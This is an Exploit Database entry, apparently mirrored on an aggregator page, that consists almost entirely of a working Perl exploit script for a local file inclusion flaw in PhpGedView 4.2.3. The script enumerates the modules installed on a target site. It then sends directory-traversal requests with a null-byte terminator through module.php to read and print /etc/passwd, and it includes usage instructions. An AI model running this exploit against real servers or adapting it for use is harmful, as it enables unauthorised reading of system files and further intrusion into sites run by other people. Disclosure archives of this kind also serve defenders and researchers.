PhpGedView 4.2.3 – Local File Inclusion

• Exploit Database
• 10 阅读

• 作者： dun
  日期： 2011-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15913/

• #!/usr/bin/perl -w
   
  #:::::::-. ...::::::.:::.
  # ;;, `';, ;; ;;;`;;;;,`;;;
  # `[[ [[[[' [[[[[[[[. '[[
  #$$,$$$$$$$$$$ "Y$c$$
  #888_,o8P'88.d888888Y88
  #MMMMP"` "YmmMMMM""MMM YM
  #[ Discovered by dun \ posdub[at]gmail.com ]
  #
  ##################################################################
  #[ PhpGedView <= 4.2.3 ]Local File Inclusion Vulnerability #
  ##################################################################
  #
  # Script: "PhpGedView is a revolutionary genealogy program which
  #allows you to view and edit your genealogy on your website..."
  #
  # Script: http://www.phpgedview.net/
  # Download: http://sourceforge.net/projects/phpgedview/
  #
  # Usage: perl expl.pl http://site.com/phpgedview/
  #
  ##################################################################
  #[ dun / 2011-01-05 ]
  
  use IO::Socket;
  use Socket;
  use IO::Select;
  
  
  my @modules; 
  
  if(scalar(@ARGV) < 1) {
  print "\nUsage: perl expl.pl http://site.com/phpgedview/\n\n";
  exit;
  }
   
  print "\033[32m[1] \033[0mChecking installed PGV modules..\n";
  @modules=get_modules_list($ARGV[0].'/modules/');
  print "\033[32m[2] \033[0mTrying to read /etc/passwd file..\n";
  p(\@modules, $ARGV[0].'/', '/etc/passwd');
  
  sub http_query {
  
   my $page="";
   my $url=$_[0];
   my $ua="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)";
  if(defined($_[1]) && defined($_[2])) {
   $host=$_[1];
   $port=$_[2];
   $get="GET $url HTTP/1.0\r\n$ua\r\nConnection: Close\r\n\r\n";
  } else {
   $port=80;
   $url=~s/http:\/\///;
   $host=$url;
   $query=$url;
   $host=~s/([a-zA-Z0-9\.]+)\/.*/$1/;
   $query=~s/$host//;
   if ($query eq "") {$query="/";};
  
   $get="GET $query HTTP/1.0\r\nHost: $host\r\n$ua\r\nConnection: Close\r\n\r\n";
  }
   my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"$port",Proto=>"tcp",Timeout => 3) or return;
   print $sock $get;
   my @r = <$sock>;
   $page="@r";
   close($sock);
   
   return $page;
  }
  
  sub get_modules_list {
   my $host = $_[0];
   my $page="";
   my @modules1=(
  "FCKeditor",
  "GEDFact_assistant",
  "JWplayer",
  "batch_update",
  "cms_interface",
  "gallery2",
  "googlemap",
  "lightbox",
  "punbb",
  "research_assistant",
  "sitemap",
  "slideshow",
  "wordsearch"
   );
  
   $page = http_query($host);
   while($page =~ m/(.*)<(a|A)\s(href|HREF)="([^\/]+)\/">/g){
  push (@modules2, $4);
   }
   if(@modules2) {
  print " Installed modules: @modules2\n";
  return @modules2;
   } else {
  print " No info about installed modules..\n";
  return @modules1;
   }
  }
  
  sub p {
   my($mods, $host, $file)=@_;
   my $page="";
   foreach $r(@{$mods}) {
  	$q="$host"."module.php?mod=$r&pgvaction=".("/.."x10)."$file%00";
  	$page=http_query($q);
  	@lines = split (/\n/, $page);
  	if($page=~ m/(.+):.:\d+:\d+:(.*):\/(.+):\/(.*)/g){
  	 print "\033[32mModule: $r\n";
  	 print "Adress: $q\n";
  	 print "File: /etc/passwd:\033[0m (Press ENTER) ";
  	 if(<STDIN>) {
  	 print "\n\n";
  	for(@lines) {
  	 if($_=~ m/(.+):.:\d+:\d+:(.*):\/(.+):\/(.*)/g){
  		print $_."\n";			
  	 }
  }
  	 }
  	return 0;
  	}
   }
   print "\033[31mFailed :(\033[0m\n"
  }
  
  ##################################################################